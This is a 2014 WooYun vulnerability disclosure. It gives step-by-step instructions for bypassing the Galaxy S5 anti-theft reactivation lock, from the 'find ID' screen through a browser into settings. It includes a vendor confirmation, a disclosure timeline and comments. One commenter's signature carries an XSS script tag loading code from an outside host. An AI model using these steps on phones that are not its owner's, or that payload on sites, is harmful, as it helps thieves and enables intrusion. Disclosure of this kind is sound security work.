当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075363

漏洞标题:秒破三星S5手机防盗功能

相关厂商:三星

漏洞作者: 猫七

提交时间:2014-09-10 11:04

修复时间:2014-12-09 11:06

公开时间:2014-12-09 11:06

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-10: 细节已通知厂商并且等待厂商处理中
2014-09-13: 厂商已经确认,细节仅向厂商公开
2014-09-16: 细节向第三方安全合作伙伴开放
2014-11-07: 细节向核心白帽子及相关领域专家公开
2014-11-17: 细节向普通白帽子公开
2014-11-27: 细节向实习白帽子公开
2014-12-09: 细节向公众公开

简要描述:

号称非常强大的三星防盗功能,近日被中国小伙指出存在漏洞,该漏洞可以秒破三星S5(Note2也存在,应该是所有版本都存在)手机防盗功能。想想还有点小激动呢。。。。。您说三星到底会不会送我个Note4啊。嘎嘎嘎嘎~~

详细说明:

帮小白朋友新买的S5,不到一个月,朋友就给锁死了。帐号也不知道,注册信息也不知道。手机交给我后,刷机提示:因不正常的出厂重置,此设备将被锁定。在论坛找了N多大神的帖子,在某宝找了N多刷机高手,得到的一致回复是无解。

wenti.jpg


我还就不信这个邪了。正好中秋假期,折腾了一天,还真扎到了一个漏洞。。。。。
关于三星防盗功能的报到:http://tech.sina.com.cn/it/2013-06-15/07188442066.shtml
  新浪科技讯 北京时间6月15日早间消息,旧金山地方检察官乔治•盖斯肯(George Gascon)周四表示,三星已承诺为其智能手机添加新功能,使用户在手机被盗后能够远程锁住手机。
  盖斯肯和纽约总检察长埃里克•施奈德曼(Eric Schneiderman)邀请各大手机制造商参与周四在纽约举行的智能手机峰会,为共同打击智能手机偷窃行为作出承诺。
  盖斯肯表示,三星已宣布新的防盗功能将于7月1日起正式发布。新功能推出后,手机偷窃者将无法再使用被锁的手机,即使换SIM卡或侵入手机软件也无济于事。三星拒绝对此消息置评。

漏洞证明:

1、为了演示,重新注册个粉嫩粉嫩的新帐号。

reg.jpg


这个帐号没有绑定任何设备哦~~~

reg2.jpg


2、设置好重新几乎锁定,刷最新的版本的刷机包。

IMG_20140907_145003_SHOT2SHOT1.jpg


3、刷好后,开机,提示锁定了。

IMG_20140907_151626_SHOT2SHOT1.jpg


4、终于开始了,下面就来破解掉它。点击 忘记您的用户名和密码?

IMG_20140907_151656.jpg


5、然后点击查找ID:

IMG_20140907_151709.jpg


6、然后再点下面的联系我们,长按屏幕的任何文本处。随便选择个文本,最上排出现了一条黑色的“按钮们”,选择最后一个浏览器的图标。(第一个小漏洞出现了,不过这个不是致命的哦。)

IMG_20140907_151738.jpg


7、选择个QQ浏览器吧。UI做的漂亮一些:

IMG_20140907_151748.jpg


8、进入咱滴大美百度(m.baidu.com),点击应用。

IMG_20140907_151833.jpg


9、随便找个应用下载就行。

IMG_20140907_151846.jpg


10、安装被阻止(别怕,最主要的漏洞就出现在这里,没有他也破解不了),直觉告诉我们要点设定,直觉是很准的哦。

IMG_20140907_151912.jpg


11、点击后,先不要急着安装。在未知来源上方出现了致命的设计漏洞。【重新激活设定】就在上边。咱就这么一点啊,就让咱输入帐号:

IMG_20140907_151933.jpg


12、输入第1步注册的粉嫩粉嫩的帐号密码,然后点击验证。(为了证明咱成功了,我特意开启了闪光灯拍照)

IMG_20140907_151944.jpg


13、登录成功后,一直按返回键、返回键、返回键、返回键、返回键、返回键、返回键、返回键。。。。(知道出现第三步的界面),然后在输入咱第1步注册的粉嫩粉嫩的帐号,点击登录。

IMG_20140907_152123_SHOT2SHOT1.jpg


14、登录成功,一路下一步就OK了。

IMG_20140907_152206.jpg


15、对我我的破解,三星表示感谢。

IMG_20140907_152227.jpg


16、明天手机就要给送回去了,留个影吧。

IMG_20140907_152625.jpg

修复方案:

屏蔽掉把漏洞证明中提出的三点流行了。

版权声明:转载请注明来源 猫七@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-09-13 13:50

厂商回复:

目前漏洞还在确认中,谢谢关注三星产品的安全问题。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-10 11:12 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    记者同志看这里。。。 我是乌云的0x_Jin

  2. 2014-09-10 11:25 | 碎片 ( 路人 | Rank:23 漏洞数:9 | <script src=http://www.xss8.net/?c=MjMf4...)

    记者同志看这里。。。 我是乌云的碎片啤酒饮料矿泉水,花生瓜子八宝粥。

  3. 2014-09-10 12:44 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    首先得有部三星手机

  4. 2014-09-10 13:00 | 娃哈哈 ( 实习白帽子 | Rank:36 漏洞数:6 | 伟大的科学家)

    记者同志求眼熟^.^

  5. 2014-09-10 13:02 | Siro ( 实习白帽子 | Rank:66 漏洞数:11 | ) <Freedom /> (Fuck)

    但凡安卓,刷机解决一切…

  6. 2014-09-10 14:05 | Suner ( 路人 | Rank:21 漏洞数:2 | 洞次打次)

    你们说,我那w2014会不会被破啊,好担心啊

  7. 2014-09-11 09:23 | 猫七 ( 实习白帽子 | Rank:58 漏洞数:7 | )

    @Siro 这个就是防刷机的。三星的这个功能,刷机后,手机直接就锁死了。我的发现的这个漏洞就是解锁。

  8. 2014-09-11 09:48 | Siro ( 实习白帽子 | Rank:66 漏洞数:11 | ) <Freedom /> (Fuck)

    @猫七 nice 你该去各大手机店卖弄风骚教技术了

  9. 2014-09-11 19:48 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    刷机30元...贴膜20元 专业刷机 贴膜 20年 未逢敌手

  10. 2014-09-13 15:39 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    坐等鹏泰水军

  11. 2014-09-13 18:58 | Arthur ( 实习白帽子 | Rank:77 漏洞数:33 | USA,I am coming!!!!!)

    CCTV的妓者,看这里!~~

  12. 2014-12-09 11:40 | 邓先生 ( 路人 | Rank:4 漏洞数:4 | 其实,打你就像划小船)

    刷机解决一切

  13. 2014-12-09 11:48 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    前提是要刷机吧,不然使用过的是已经设置好了可以安装任何来源的apk

  14. 2015-01-05 21:42 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    有本事你刷IOS